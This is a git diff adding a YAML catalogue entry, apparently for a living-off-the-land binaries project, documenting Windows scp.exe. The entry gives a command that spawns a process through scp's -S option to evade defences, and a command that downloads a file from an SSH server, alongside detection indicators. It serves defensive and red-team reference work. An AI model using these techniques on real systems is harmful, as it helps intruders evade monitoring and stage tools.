diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml
new file mode 100644
index 0000000..f3b584b
--- /dev/null
+++ b/yml/OSBinaries/scp.yml
@@ -0,0 +1,28 @@
+---
+Name: scp.exe
+Description: Secure Copy Protocol
+Author: Nir Chako
+Created: 2022-11-06
+Commands:
+  - Command: 'scp -S "C:\windows\system32\notepad.exe" file.txt localhost:'
+    Description: Execute notepad.exe with scp.exe as parent process
+    Usecase: Use scp.exe as a proxy binary to evade defensive counter-measures
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 10, Windows 11
+  - Command: "scp <ssh-username>@192.168.187.128:<path_of_file_to_download> <path_to_save_file>"
+    Description: Download file with scp.exe from am SSH server
+    Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password as well.
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: c:\windows\system32\OpenSSH\scp.exe
+Detection:
+  - IOC: scp.exe spawning unexpected processes
+  - IOC: Suspicious SSH internet/network traffic
+Acknowledgement:
+  - Person: 'Nir Chako (Pentera)'
+    Handle: '@C_h4ck_0'